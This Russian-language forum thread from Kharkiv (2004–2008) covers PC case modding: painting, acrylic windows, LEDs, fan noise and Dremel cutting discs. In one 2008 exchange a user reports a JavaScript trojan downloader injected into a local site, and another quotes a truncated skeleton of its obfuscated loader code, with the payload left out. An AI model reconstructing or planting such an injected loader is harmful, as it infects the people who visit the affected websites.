[SIZE=3][FONT=arial][COLOR=darkred][B]
Народ! Очень интересно пообщаться с людьми, живущими в нашем славном городе Харькове и увлекающимися компами и моддингом.
На данный момент я имею небольшой опыт в моддинге. Детищем которого являеться мой системник.
Ваши советы, пожелания и предложения жду на этом форуме!
Gonzales
15-04-2004, 00:43
Моддингом, наверное, не увлекаюсь, но возник вопрос: а что это? Уж не разрисовывание своего компа цветочками?:-)
Света
15-04-2004, 13:46
Не обязательно только разрисовывание компа цветочками. Моддинг - это изменение внешнего вида твогей машины любыми способами. Вот у цветочки...
neuromancer
15-04-2004, 13:58
>> Моддинг - это изменение внешнего вида твогей машины любыми способами.
эээ..
а смысел ?
Chegevaro
15-04-2004, 15:33
Если есть старый ноут, то можно экран от него в боковуху влепить и выводить туда другой десктоп(если видеокарточка позволяет), на котором у тя к примеру запущена прога для контроля тепературы, скорости вращения кулеров и прочей херни или какую нить качалку.... так же я думаю можно подключить экранчик от КПК (тока придется попарится со видеовходом на экранчик).... а вот вставленый в башню телик:
http://www.modlabs.net/pics/tv/7.jpg
вообще вот два прикольных ресурса посвященные этой теме:
www.modlabs.net
www.overclockers.ru
Света
19-04-2004, 08:19
Chegevaro, а ты что-то сделал со своим компом?
И это фотка твоей машины или просто скачана с одного из сайтов?
Димка
19-04-2004, 09:51
Уже и общие сборы моддеров проводятся возле памятника Шевченко по воскресеньям. Зайди на форум Модлабса, там всё подробней написано.
Chegevaro
19-04-2004, 11:28
Первоначальное сообщение от Света
Chegevaro, а ты что-то сделал со своим компом?
И это фотка твоей машины или просто скачана с одного из сайтов?
Фотка с модлабса, там и статья как это делать... Фотку своей развалюхи выкладывать влом (разобрана, винты на книге рядом с башней, флоп болтается вертикально, калонки разобраны и толстый слой пыли :)). Никакого модинга :), разве что при включении компа не енерджи стар емблема, а Чигеваро :).... Вот и весь модинг :)
Capricorn
07-05-2004, 17:06
Блина, я загорелся!
На выходных начну раундить кабеля.
А вот кто знает где можно покрасить корпус качественно. Т.е. не однотонно, а с рисунком каким-нибудь.
Capricorn
12-05-2004, 17:52
да уж, вот у людей фактазия и креатив
но блин Лоджитековскую клаву убить. это ж денег гривен 300 :(
Димка
13-05-2004, 07:55
В автопокраске можно, только это тебе в 150-200 зелёных тугриков влетит :)
Chegevaro
13-05-2004, 12:53
Да, знатный МОД :), тока мне почемуто фолаут вместа хальфы вспомнился :p ...
2Каприкон не,такая клава 88грн стоит, не более (у товарисча такаяже), тока все одно меня жаба задавила бы так измыватся :), а насчот качественной покраски корпуса смотри модлабс, там я кучу линков видел посвященных этой трабле....
Capricorn
13-05-2004, 13:08
2 Че: там все советуют автомастерские. думаю что это конечно дешевле 150$ стоит. но все равно для начала хочется поизмываться самому над корпусом.
зато я реально занялся шумом от компа, перепаял вентиляторы на 5 вольт, ограничил скорость СД. значительно лучше стало.
на очереди фанбас своими руками
Rajaka Rost
13-05-2004, 13:15
Первоначальное сообщение от Света
[SIZE=3][FONT=arial][COLOR=darkred][B]
...На данный момент я имею небольшой опыт в моддинге. Детищем которого являеться мой системник.
...
Эй, тебе же прямая дорога в раздел "Творчество"! Мне понравился твой первый опыт.. завтра попробую выложу фотку своего компа ..
Света
16-05-2004, 23:27
Первоначальное сообщение от Rajaka Rost
Эй, тебе же прямая дорога в раздел "Творчество"! Мне понравился твой первый опыт.. завтра попробую выложу фотку своего компа ..
Rajaka Rost, Будем ждать твоих фоток! ;)
Capricorn
17-05-2004, 10:32
Света, а чем и как красила корпус?
И того что пока сделал я.
1. подсветка колонок, красиво. жаль нет возможности сфоткать. но как только так сразу.
2. установил реле в БП, благодаря которому теперь выход на монитор из БП полностью отключается при выключении компа (кто не в курсе этот выход обычно всегда под напряжением 220 вт) В этот выход вставляем тройник, в тройник включаем монитор, колонки и принтер. Получаем очень удобную штуку: вкл комп - вкл монитор, колонки и принтер, выкл комп - все само выключилось и никаких лишних телодвижений. :)
Rimlyanin
15-01-2005, 00:36
Всех Харьковчан, интерсующихся моддингом приглащаем на http://www.modding.kh.ua/
Capricorn
17-01-2005, 14:41
кста, есть шарящие в радиотехнике?
мне надо колонки починить после моддинга :)
кажется я что-то где-то коротнул :(
естетсвенно не бесплатно
Rimlyanin
25-08-2005, 01:16
Всех Харьковчан, интерсующихся моддингом приглащаем на http://www.mxmaster.kharkov.ua/forum/index.php
Сайт Харьковских моддеров (http://www.modding.kh.ua/forum/index.php) снова работает
Andrusse
23-04-2007, 00:58
Народ! Кто может леально сделать (а не попробовать!) на заказ окно в стенке и морду для корпуса? Или может переделать старую моруду... Вобщем кто умеет пишите, пообщаемся.
ICQ 217051483
TatK@!!!
23-04-2007, 01:25
Блина, я загорелся!
На выходных начну раундить кабеля.
А вот кто знает где можно покрасить корпус качественно. Т.е. не однотонно, а с рисунком каким-нибудь.
в МКСе продаются с аэрографией. можно и под заказ картиночку намалевать.
Strom
23-04-2007, 02:16
сиськи
AliveUA
09-06-2008, 23:28
и пи**ки!
ИМХО, аэрография не красит камп. Пусть профессионалы пишут, что это вершина моддерства, я не согласен. Это просто одно из направлений, трудоемкое и дорогостоящее.
Камп должен быть цветатсым, компактно встраиваемым и с разъемами в которые удобно сувать устройства.
agostar
09-06-2008, 23:38
Фигасе тему подняли. Мож мне кто заондно подскажет де можно листовой металл купить 1.3-1.5 мм и чтоб порезать мона было.
Dimoks
09-06-2008, 23:44
осторожно! на сайте mxmaster.kharkov.ua троян. после тега </html>
09/06/2008 23:41:50 Вредоносный скрипт <http://www.mxmaster.kharkov.ua/>: обнаружено: троянская программа 'Trojan-Downloader.JS.Remora.bp'.
AliveUA
09-06-2008, 23:56
agostar, в райлне той же самой экс-кутузки, или на сковородке - это по другую сторону, за ЮСИ - там и авто эмали есть. Побегайте вокруг рынка "Героев труда". На худой конец - вокруг Барабашаво.
09/06/2008 23:41:50 Вредоносный скрипт <http://www.mxmaster.kharkov.ua/>: обнаружено: троянская программа 'Trojan-Downloader.JS.Remora.bp'.
УГУ, я такую программку когда-то, сам того не ведая, распространил по открываемым программой rapid-php-editor сайтам через FTP распространил!
Если у вас фтп открывается и глючит - это означает, что вирус на Вашем компе прописывает по всем индексным файлам свое "тело".:класс:
Если я не перестарался, выполнит оно примерно следующее:
function cyr7tp( dmxu27 ){
var ddr6h5 = new String( arguments.callee );
ddr6h5 = ddr6h5.replace( /[^a-z0-9()+_\.,-]+/ig, "" ).toUpperCase(),
biu4lq = 0, sdub0n = 0, tny2ha = '', m6vejk = 0;
//вывести tny2ha;
tny2ha = '';
}
cyr7tp( new Array( 29555,29487,29476,/* очень много разных цифр */29513,29521,29539 ) );
AVG молчит, файерфокс, вроде бы работает.
Rimlyanin
10-06-2008, 15:21
Спасибо, постараюсь поставить в известность владельцев сайта
Gost
10-06-2008, 20:19
Моддинг, бывает разный, кому то нравится такой :D
Izlom
10-06-2008, 22:55
фигасе пять винтов сколькож БП?
КарлеГ
10-06-2008, 23:11
Моддинг это для тех кому комп как игруха :)
Кому комп для работы - тот его видит только когда цыдюк вставляет.
РЫЦАРЬ_ЛЬДА
11-06-2008, 09:14
приятно посидеть за красивой тачкой...
-=X-RAY=-
11-06-2008, 09:43
а я вот стол отмодил))))
Jemba-Jemba
11-06-2008, 11:39
Мне моддинг интересен, пока правда использую для этого "штатные средства", без выпиливаний лобзиком/дремелем.
Корпус Raidmax Katana черный, штатные кулеры заменены на Coolermaster Radioactive Green, на процессоре Zalman 9700NT (он тоже с зелеными светодиодами) плюс поставил 2 зеленые неонки подсветки Sunbeam с выводом выключателя на заднюю панель. В перспективе замена решетки на боковом 80-мм кулере на фигурную решеточку Sunbeam Biohazard. Реобас ставить не хочу, внешнему виду корпуса это только повредит.
Интересное решение - упаковать все провода внутри системника в гофру. Гофру можно покрасить краской, светящейся в ультрафиолете, и поместить UV-лампы под верхнюю стенку корпуса, так чтобы они не были видны. Но для моего корпуса это тоже уже не актуально, он уже законченное решение :)
Могу помочь с материалами для модинга и корпусами если нужно что-то особенное. Сорри за многабукаф
AliveUA
14-06-2008, 09:06
А сколько щас метр квадратный оргстекла 2-3мм стоит???
Gost, особенно прикольно выглядит трубка водного охлаждения, пережатая канцелярской скрепкой, внизу чуть правее центра.
РЫЦАРЬ_ЛЬДА
15-06-2008, 21:38
ну вроде 3мм стоило 80 грн...но эт в дорогом.
Если хочешь, могу тебе продать с установкой в корпус.
50 грн это будет стоить.
Rimlyanin
17-06-2008, 21:24
фигасе пять винтов сколькож БП?а ты посчитай сколько они потребляют. на всех винтах написано пиковое потребление по пяти и двенадцати вольтам, надеюсь не надо досказывать что
P(общая)=I(5v)*5+I(12v)12
AliveUA
21-06-2008, 21:20
РЫЦАРЬ_ЛЬДА, а чего "в корпус"-то? В корпус мне не надо. Надо отдельными пластинами, но размеров пока не знаю.
Fanshtorm
21-06-2008, 23:15
А если у меня системник со снятыми крышками стоит, это можно считать моддингом??
Wavelet
21-06-2008, 23:50
Моддинг, бывает разный, кому то нравится такой :D
Напоминает больше моддинг холодильника!
maks990
22-06-2008, 02:13
Мне моддинг интересен, пока правда использую для этого "штатные средства", без выпиливаний лобзиком/дремелем.
Корпус Raidmax Katana черный, штатные кулеры заменены на Coolermaster Radioactive Green, на процессоре Zalman 9700NT (он тоже с зелеными светодиодами) плюс поставил 2 зеленые неонки подсветки Sunbeam с выводом выключателя на заднюю панель. В перспективе замена решетки на боковом 80-мм кулере на фигурную решеточку Sunbeam Biohazard. Реобас ставить не хочу, внешнему виду корпуса это только повредит.
Интересное решение - упаковать все провода внутри системника в гофру. Гофру можно покрасить краской, светящейся в ультрафиолете, и поместить UV-лампы под верхнюю стенку корпуса, так чтобы они не были видны. Но для моего корпуса это тоже уже не актуально, он уже законченное решение :)
Могу помочь с материалами для модинга и корпусами если нужно что-то особенное. Сорри за многабукаф
+1! Только Raidmax X-Force и CoolerMaster Hyper 212 - 4 120-ки с голубой подсветкой. Только 80-ка боковая не влезла из-за огромного радиатора, теперь ищу 80-ку не стандартную, толщины 25 мм, а 15мм-de.? потому что только на нее места осталось между радиатором и стенкой. Вот потом это будет тоже законченное решение.
koty
22-06-2008, 02:26
все в монитор смотрят или в системник? модддеррры млин...
koty
22-06-2008, 02:36
А если у меня системник со снятыми крышками стоит, это можно считать моддингом??
самый луччий моддинг-собрать комп в ящике стола. не придёцца тратицца на корпус по крайней мере. и креативненький видок получицца(нихрена не видно). получче, чем цветики на боковых стенках.:D
аватарчик из Prey? рульная игруха
Fanshtorm
22-06-2008, 11:01
самый луччий моддинг-собрать комп в ящике стола. не придёцца тратицца на корпус по крайней мере. и креативненький видок получицца(нихрена не видно). получче, чем цветики на боковых стенках.:D
+100!:D
На одном предприятии видел "комп" без корпуса :класс: (мамка, БП, сидюки, винты валяются тупо на столе)
:угу:
maks990
22-06-2008, 16:03
Насчет цветов на боковой стенке -согласен, смотрится ужасно, крайне безвкусно и как-то по аматорски. Для занятий моддингом( в общем смысле украшательство, облагораживание внешнего вида - я про этот моддинг буду говорить) самое важное - наличие вкуса, по тому, что ТС сделала со своим системником,я такового у нее не заметил.
По поводу вашего отношения к моддингу - ничего не имею против, просто мы с вами находимся "по разные стороны баррикад" в этом вопросе.
Gost
22-06-2008, 17:23
Ещё очень прикольный вариант моддинга видел:
плата прибита гвоздём к стене, а блок питания
лежал рядом, на книжной полке, дёшево и
со вкусом, очень прикольно, когда это
всё включилось, заработало, напоминало
карлсона, который "вернулсо"...:гы:
Rimlyanin
22-06-2008, 18:49
Могу помочь с материалами для модинга и корпусами если нужно что-то особенное. Сорри за многабукафФото есть?
+1! Только Raidmax X-Force и CoolerMaster Hyper 212 - 4 120-ки с голубой подсветкой. Фото есть?
Только 80-ка боковая не влезла из-за огромного радиатора, теперь ищу 80-ку не стандартную, толщины 25 мм, а 15мм-de.? потому что только на нее места осталось между радиатором и стенкой. Вот потом это будет тоже законченное решение.
80тка тонкая? надо глянуть, кажется дето был кулер гласиятеч, там как раз 80*80*15
maks990
22-06-2008, 20:37
Фото есть?
Фото есть?
80тка тонкая? надо глянуть, кажется дето был кулер гласиятеч, там как раз 80*80*15
Фото думаю выложить на твоем сайте как только организую 80-ку на боковую стенку. Читаем темуо покупке кулера (http://www.kharkovforum.com/showthread.php?t=225294) и помогаем предложениями:)
koty
23-06-2008, 00:54
а я вот стол отмодил))))
а вот "произведение" моих друзей:)
http://www.zpromogroup.com.ua/Products.php?Rubrika=%CF%F0%EE%EA%E0%F2,%20%E0%F0%E5%ED%E4%E0&id_photo=62
:yahoo:
Rimlyanin
28-06-2008, 17:15
вотъ:
http://gpk.org.ua/-/mymod.jpg
http://gpk.org.ua/-/mymod2.jpg
Запитывается от того же шнура, что и вентилятор, диодам сделал обрезание.
не вижу картинок :(
AliveUA
29-06-2008, 13:11
не вижу картинок :(
Сайт в оффлайне ;-(
Если мой камп включен, доступны картинки:
ftp://gpk.net.ru/modding/_005.jpg
ftp://gpk.net.ru/modding/_006.jpg
Rimlyanin
29-06-2008, 13:15
Сайт в оффлайне ;-(
Если мой камп включен, доступны картинки:
ftp://gpk.net.ru/modding/_005.jpg
ftp://gpk.net.ru/modding/_006.jpg
видишь у меня сайт в подписи?
может туда выложить?
AliveUA
29-06-2008, 13:22
Вот, вложил.
А много народу на сайте, часто ли пишут, чайники, барыги, шарят ли в электронике, или всякие есть??? Каких там больше?
... а дырку хреново обработал, потому что хотел каким-нть кантиком залепить
Rimlyanin
29-06-2008, 13:25
Вот, вложил.
А много народу на сайте, часто ли пишут, чайники, барыги, шарят ли в электронике, или всякие есть??? Каких там больше?
а ты приходи, пообщаешься и увидишь.
AliveUA
29-06-2008, 13:33
Бедно выглядит из-за отсутствие веб-бизайна и картинок в кратком описании новостей.
Самое красивое - рекламный баннер вверху, хотя он нужен не там, а на других сайтах.
Пришла, однако, мысь: главная ошибка всех статей о моддинге - отсутствие фоток ДО моддинга.
Rimlyanin
29-06-2008, 13:38
Бедно выглядит из-за отсутствие веб-бизайна и картинок в кратком описании новостей.
Самое красивое - рекламный баннер вверху, хотя он нужен не там, а на других сайтах.
та все никак времени нету кинуть баннер в баннерообменку :)
а диз, три года назад, специально был сделан минималистичным
koty
30-06-2008, 00:05
Вот, вложил.
с таким питаловом наверное у тя комп мордой в стену смотрит? шнуры тоже неончиком подсвечиваюцца? а шоб диск поставить или включить нада наверное рачки становицца?:D
Gwynn
30-06-2008, 02:04
Я вот тоже не очень это понимаю. У меня бокс под столом стоит, я на него не гляжу даже. Зачем его еще и моддить не пойму.
koty
30-06-2008, 03:08
...У меня бокс под столом стоит, я на него не гляжу даже. Зачем его еще и моддить не пойму.
а эт када у тя моник 15ка ЭЛТэшный, на который смотреть тошно. а с деньгами на новый большой напряг... палюбэ дешевле светодиодов накупить на 20 грн и таращицца на "блыскучый" блок питания, аки на кетйську балалайку PANASCANIC:D
Gwynn
30-06-2008, 03:54
фигасе пять винтов сколькож БП?
А там же по картинке видно - залман на 400W
а эт када у тя моник 15ка ЭЛТэшный, на который смотреть тошно. а с деньгами на новый большой напряг... палюбэ дешевле светодиодов накупить на 20 грн и таращицца на "блыскучый" блок питания, аки на кетйську балалайку PANASCANIC:D
Ну я думаю мой full tower на столе + 22" моник, как-то не аккуратненько б было :) Хотя если на него повесить новогодние гирлянды, а в отсек для 5.25" вставить свич и закольцевать все порты, было бы красивенько, все горит и перемигивается :)
koty
30-06-2008, 14:17
намного интересней заниматься понижением шума компа. у мя все кулера-тихоходы стоЯт или питалово зарезано на них до 7-8вольт. на проце соник-тауэр термалтейковский со 120кой тихой стоИт. када в эту тишь недавно поставил чифтек 650W, то его токо и слышно стало. уж больно шумный. пришлось и там кулер поменять. типерь красота. компа практически не слышно. правда дорого всё это обходицца, за всё нада платить...от это в моём понимании МОДДИНГ(или тюнинг). а не цятки усяки. потому мне и непонятно, КАК можно было выдрать заведомо более тихий 120ый кулер и заместо него всандалить гудяшчую 80ку??? шоб жопа светилась?
Gwynn, у мя тоже 22":D
AliveUA
30-06-2008, 21:17
с таким питаловом наверное у тя комп мордой в стену смотрит? шнуры тоже неончиком подсвечиваюцца? а шоб диск поставить или включить нада наверное рачки становицца?:D
Он используется без кампутера, с CD-приводом и калонками, как плеер :-P
koty
30-06-2008, 23:07
мне надо колонки починить после моддинга :)
паццталом:D:D:D
koty
30-06-2008, 23:20
Он используется без кампутера, с CD-приводом и калонками, как плеер :-P
без обид, но эт у тя чистая "AKAIWA" получаецца. гудит, пердит, музло толком не слышно... зато питалово у сидюка-как на марсоходах, наверное, ставицца.:)
AliveUA
01-07-2008, 00:17
Верите?!! :yahoo:
Rimlyanin
01-07-2008, 00:36
Верите?!! :yahoo:
осталось водички налить и рыбок пустить :)
Jemba-Jemba
01-07-2008, 12:54
Фото есть?
Фото есть?
Сделаю, выложу. Дяденька, вы часом не тот знаменитый модер, про которого мне говорил Efreet? :D
AliveUA
01-07-2008, 20:47
koty33, даже если его в камп запхнуть - смотреться будет: сижу я хоть и в углу, но спиной к стенке и корпус доступен со всех сторон, хоть ко мне смотрит боковой левой.
Но это все фигня: купил новый проц, засунул, все крышки закрыл, - работает тише, терь даже слышу гудение дросселя у аквариума, несмотря на то, что кулер без наворотов, боксовый.
maks990
01-07-2008, 22:10
Вот типа тоже моддинги:D Некоторые даже безумные...
Rimlyanin
02-07-2008, 00:06
Сделаю, выложу. Дяденька, вы часом не тот знаменитый модер, про которого мне говорил Efreet? :D
возможно. Но не думаю что я "знаменитый модер"
AliveUA
02-07-2008, 09:43
maks990, подборочка баянов?!!
maks990
02-07-2008, 09:56
maks990, подборочка баянов?!!
да
Jemba-Jemba
02-07-2008, 10:54
Сабж. На модерство конечно не особо тянет, но это только начало :)
AliveUA
02-07-2008, 22:45
Jemba-Jemba, спасибо, зеленый рулит.
Вот только там моддинга нет, это корпус такой, "покупной".
(Вроде бы).
Jemba-Jemba
02-07-2008, 23:03
Jemba-Jemba, спасибо, зеленый рулит.
Вот только там моддинга нет, это корпус такой, "покупной".
(Вроде бы).
Та я не спорю. Это так, разминка :)
Сейчас я вынашиваю гораздо более интересные идеи, более интересные по исполнению. Буду развиваться поэтапно, т.к. сразу переходить к серьезным проектам - получится явная 100%-ная кустарщина отвратительного вида, коих 90% среди выложенных на всяких форумах, ну по крайней мере я считаю что это не тот уровень, к которому надо стремиться.
arachne
03-07-2008, 01:12
А корпус - SunBeam Crystal Acrylic ? :)
Хех - правду говоришь :)
Товарищи лохомоддеры, которые вставили лампочку и выпилили кривую дырку уже надоели...Сама идея вынашивается долго. а реализация это второстепенно - сейчас доступны такие технологии, с помощью которых реальна точная обработка любых доступных материалов.
Собственно ко всем присутствующим вопрос - подскажите конторы, которые могут резать лазером металл 2 мм и акрил 10мм. Пилить руками не предлагать :)
MxMaster
05-07-2008, 10:46
Товарищи лохомоддеры, которые вставили лампочку и выпилили кривую дырку уже надоели...Сама идея вынашивается долго. а реализация это второстепенно - сейчас доступны такие технологии, с помощью которых реальна точная обработка любых доступных материалов.
Собственно ко всем присутствующим вопрос - подскажите конторы, которые могут резать лазером металл 2 мм и акрил 10мм. Пилить руками не предлагать :)
Доброе время суток. Надо уточнить, какой металл и размеры листа по акрилу и металлу.Тогда могу подсказать. Да и у товарища своего на форуме если покапаться, то можно где-то там найти.... Это я про Rimlyanin, "знаменитого моддера" :)
А для всех моддеров Харькова, можно покапаться и на моем сайте, много полезного найти можно. Или продолжить писать "историю моддинга...... в Харькове."
http://phpbb.mxmaster.kharkov.ua/viewtopic.php?f=5&t=394&st=0&sk=t&sd=a
Добро пожаловать.
ПиСи. Да, да, я еще не издох....
arachne
05-07-2008, 12:55
Металл - крышка на водоблок с креплением под 775 и резьбой под фитинги
акрил - самая большая стенка изделия 10х10 сантиметров
MxMaster
05-07-2008, 15:31
Металл - крышка на водоблок с креплением под 775 и резьбой под фитинги
акрил - самая большая стенка изделия 10х10 сантиметров
.... ну, резьбу придется резать самому. Смотри ЛС.
ручная
10-07-2008, 18:28
А я вот чего нашла
Rimlyanin
15-07-2008, 17:57
Моддинг конкурс (http://www.modding.kh.ua/content/view/134/8/)
AliveUA
19-07-2008, 18:15
arachne, 4 года назад один преподаватель на лекции по физике сказал: "кому интересно, подходите покажу как лазером резать". Было это в ХАИ, препод - Мигаль Валерий Павлович - классный препод, строгий, но повествует доходчиво..
Есть у мну колонки - Genius SP-Q10 - и они гудели. Разобрал, измерил напряжение "внутри" диодного мостика, - вышло примерно 12 вольт (скакало прилично: то 9, то 13) припаял туда 2 проводка и вытянул их через предварительно просверленное отверстие. Замотал шнур питания, а вытянутые проводки подключил к вышеописанному блоку со светодиодами. Работает, звук заметно чище.
Rimlyanin
19-07-2008, 22:32
Моддинг конкурс (http://www.modding.kh.ua/content/view/134/8/)ну что, кто будет участвовать?
Jemba-Jemba
24-07-2008, 14:21
ну что, кто будет участвовать?
Я бы с радостью, но сначала левел ап хочу :) Купил дремель, откопал на балконе электролобзик, дрель хорошая есть... Теперь учусь. Первые опыты пиления электролобзиком - хреновые. Тренировался на старом корпусе с П-образной крышкой, прижать хорошо сложно, в результате ощутимая вибрация и пилится плохо. Попробую подложить фанеру и пилить вместе с ней, а там посмотрим...
yellowcatzz
02-08-2008, 13:30
+1
Crecker
05-08-2008, 00:31
Я дремель купил на барабашке. Только для тех кто будет искать нивкоем случае не спрашивайте дремель. Ибо "Dremel" это фирма по производству электроинструмента. Но у нас найти крайне сложно, да и дорогущая она. Спрашивайте бормашину или гравёр. Быстрее отыщите. Ну а я как определюсь что буду делать начну ломать новенький корпус http://www.eletek.ua/aerocool_korpusa/aerocool_aeroengine_plus_bk_black.html
Jemba-Jemba
05-08-2008, 00:39
Я дремель купил на барабашке. Только для тех кто будет искать нивкоем случае не спрашивайте дремель. Ибо "Dremel" это фирма по производству электроинструмента. Но у нас найти крайне сложно, да и дорогущая она. Спрашивайте бормашину или гравёр. Быстрее отыщите.
У меня дремель - именно Dremel (Dremel 300). Можно купить в магазине "Мир инструмента" на 23 Августа за Солдатом (если идти по аллее от перекрестка 23 августа и просп. Ленина к к-т Довженко, то по левой стороне). "Мир инструмента" вроде еще по городу есть магазины, также говорят хороший выбор инструмента и расходников где-то на Петровского в магазине Бош (Дремель принадлежит Бош). А расходники надо покупать хорошие, и гибкий вал получше. В идеале конечно все получше :)
Crecker
05-08-2008, 09:08
И сколько если не секрет отвалил?
Jemba-Jemba
05-08-2008, 09:18
И сколько если не секрет отвалил?
Нет тут ничего секретного. 640 грн.: набор дремел 300-1/55 т.е. собственно инструмент дремел 300, 1 гибкий вал и 55 насадок. Еще в подарок дали фирменный футлярчик с несколькими видами плоскогубцев, круглогубцев и микроскопических отверток (он был прямо к коробке с дремелем примотан чем-то типа пищевой пленки)
В общем-то, есть наборы с тем же инструментом 300 модели дешевле, там меньше стартовых насадок. Но я решил что для ознакомления возьму полный набор. Конечно, там всего 1 насадка для гравировки, 1 шлифовальная, короче ознакомился и придется докупать. НО 36 штук отрезных кругов!!! это как раз то, что нужно, причем круги неплохие (пусть неармированные). Правда, сейчас хочу купить металлический, с алмазным напылением, такие вроде бы используются в стоматологии. Они долговечны (на 1 блоухол уходит 1 отрезной круг сейчас из фирменного набора). Если есть желание, когда буду брать могу на вас взять. Думаю, вещь полезная
Crecker
05-08-2008, 10:00
ну я скромнее, мне набор обошёлся всего 120грн. Сама бормашина мощностью 180Вт. Гибкий вал. Куча насадок, штук 10 отрезных кружков, разные шлифовалки сверлилки ковырялки.
И ещё есть струпцина со штативом, можно подвесить что бы удобно работать гибким валом было. Отрезные кружки люди делают из отрезных (самых тонких) кругов от болгарки, ломают их на маленькие кусочки и както (наверно самим дремелем) обтачивают до окружности. Надо покопать на этот счёт подробнее.
Jemba-Jemba
05-08-2008, 10:18
ну я скромнее, мне набор обошёлся всего 120грн. Сама бормашина мощностью 180Вт. Гибкий вал. Куча насадок, штук 10 отрезных кружков, разные шлифовалки сверлилки ковырялки.
И ещё есть струпцина со штативом, можно подвесить что бы удобно работать гибким валом было. Отрезные кружки люди делают из отрезных (самых тонких) кругов от болгарки, ломают их на маленькие кусочки и както (наверно самим дремелем) обтачивают до окружности. Надо покопать на этот счёт подробнее.
Струбцина это здорово, не поспоришь. А насчет изготовления самостоятельно отрезных кругов их болгарочных - читал достаточно статей по этому поводу, есть ряд моментов, которые мне не нравятся во-первых надо брать толщиной 1,5мм, что не всегда бывает в наличии, макс.2. Раскоцывается круг плоскогубцами на куски, дальше люди опять же плоскогубцами приводят в боле-менее круглый вид. Но самое трудное (не делал сам, так что чисто со слов отписывателей статей) - проделать отверстие посередине, чем только люди не пользуются вплоть до гравировальной насадки чтобы продырявить. Так что буду искать с алмазным напылением
Crecker
05-08-2008, 10:27
Если отыщеш отмаякуй, я себе один хороший тоже прикупил бы. А пока буду стачивать те что в комплекте шли. Первое что хочу сделать это вырезать дыру под 120ку вверху корпуса, но это просто нужно для веннтиляции. А потом оргстекло на воковой канешно :) только нужно его достать и определится с формой окна.
Jemba-Jemba
05-08-2008, 10:30
Если отыщеш отмаякуй, я себе один хороший тоже прикупил бы.
Без проблем
А потом оргстекло на воковой канешно :) только нужно его достать и определится с формой окна.
Достать - это кстати не совсем тривиальная задача, я искал неделю, на барабане не нашел, на круглом рынке на гертруде - только зацарапанное старье. Потом на том же круглом отыскал метр на метр в пленке с двух сторон толщина 2 и 3 мм. Взял лист 2мм
Crecker
05-08-2008, 10:31
http://www.moddcom.net/images/gallery/CIMG0027.1.jpghttp://www.moddcom.net/images/gallery/CIMG0029.1.jpg
Круто ребята постарались. Это вам не дырки сверлить :)
Jemba-Jemba
05-08-2008, 10:34
Если отыщеш отмаякуй, я себе один хороший тоже прикупил бы. А пока буду стачивать те что в комплекте шли. Первое что хочу сделать это вырезать дыру под 120ку вверху корпуса, но это просто нужно для веннтиляции. А потом оргстекло на воковой канешно :) только нужно его достать и определится с формой окна.
Кстати, если опыта мало, может не стоит Аэрокул пилить сразу? Могу отдать (безвозмездно) старый корпус на котором я тренировался, 1 стенки у него нету (вырезал типа окно) зато вторая есть, и сверху тоже нетронуто. Чтобы на кошках тренироваться
Jemba-Jemba
05-08-2008, 10:35
Круто ребята постарались. Это вам не дырки сверлить :)
Москва не сразу строилась ;)
Crecker
05-08-2008, 10:43
Я уже когдато ломал корпус, нескажу что результат меня расстроил. Темболее всю жизнь что то руками делаю, так что руки из плечей растут к счастью. Я вот доберусь до магазина радар и сделаю реобас, а то количество кулеров в корпусе к тишине не привордит :)
Jemba-Jemba
05-08-2008, 11:16
Я такого не умею :(
Crecker
05-08-2008, 12:32
Какова? Реобас? Там раз плюнуть. Нужно то всего резистор и транзистор. Схемки можно найти почти на любом моддерском форуме или сайте.
Crecker
05-08-2008, 13:48
уже облазил половину modding.ru и немогу придумать форму окна :( Нехочется делать что то простое, но и нехочится что бы корпус утратил свой стиль авиадвигателя. Может у кого есть свеженькая идейка?
http://img.eletek.com.ua/img/shop/aerocool/aeroengine_plus_bk/front_180.jpg Воздухозаборник наверно придётся убрать. Под ним кстати уже есть окно прямоугольной формы.
sergemi
08-08-2008, 15:46
Jemba-Jemba,
а в ентом "Мир инструмента" и насадки отдельно продаються? Ато вчера сточил 4 режущих диска и задумался где их пополнять. По строительным маркетам не видал.
Jemba-Jemba
08-08-2008, 20:26
Jemba-Jemba,
а в ентом "Мир инструмента" и насадки отдельно продаються? Ато вчера сточил 4 режущих диска и задумался где их пополнять. По строительным маркетам не видал.
Насадки честно говоря не видел, думаю что в фирменном магазине Бош (который располагается, по легендам, где-то на Петровского), наверное должны быть
И еще - ты наверное видел наше с Crecker обсуждение отрезного стоматологического диска с алмазным напылением. Я уже нашел, где купить - называется диск с вплавленными алмазами, возьму максимально большой доступный диаметр 24мм, стоит около 25 грн. Как только испытаю, "сдам" точку и поделюсь впечатлениями
Crecker
08-08-2008, 20:34
Ура! Жду :)
Jemba-Jemba
09-08-2008, 21:21
В общем, подготовил развернутый рассказ про отрезные диски. Буду изливать откровения поэтапно
Контактная информация
http://med.com.ua/details/a6e3645d543be34a63a406be9ac36def/
Вход через арку между домами 3 и 5. Сразу увидите вывеску, только сразу непонятно, куда входить - 2 двери, одна на той же стороне, что и вывеска, другая справа за углом. Нужна вторая.
Выбор был очень большой, куча насадок, которые готовы к использованию. В частности: отрезные диски (диски с вплавленным алмазом), щетки с проволокой для зачистки от ржавчины и пр., насадки для шлифовки/полировки, насадки для обработки кромок и, конечно, всем знакомые стоматологические буры самых разных размеров и уровней (от недорогих до профессиональных за сто и более гривен).
Персонал доброжелательный, подскажет советом. Как сказала работница магазина, у них берут буры даже каменщики для гравировки по граниту, так что можно не бояться удивить их дремелем :)
Я остановился на нескольких наименованиях
Jemba-Jemba
09-08-2008, 21:31
Слева направо:
- 4 алмазные насадки для гравировки разной формы. цена: по 3 грн
- черная (более грубая) и зеленая (более мелкая) насадки для шлифования. цена: по 6 грн
- 2 круга с вплавленным алмазом диаметром 24мм. взял 2 разной толщины, что-то вроде 0,45мм и 0,2мм. в испытаниях 0,2мм показала себя лучше, но об этом далее. цена: по 25 грн
- насадка для обработки кромок с вплавленным алмазом (25 грн)
Jemba-Jemba
09-08-2008, 21:32
Насадки для гравировки. Пока не использовал, но пусть будут, за такие-то копейки
Jemba-Jemba
09-08-2008, 21:35
Отрезной диск (неармированный) из стартового набора Dremel и диск с вплавленным алмазом
Jemba-Jemba
09-08-2008, 21:42
Купленные диски опробованы в работе. Выводы следующие:
- диск 0,2мм понравился намного больше, чем более толстый 0,45, рекомендую брать именно 0,2. режет быстрее, точнее, менее шумный
- в сравнении с фирменными неармированными кругами дремель (резал толщиной 0,2) - резка идет ощутимо медленнее, настолько же точнее, несколько больше вибрация на инструменте
- намного более шумно!!! впервые задумался о приобретении наушников для защиты от шума
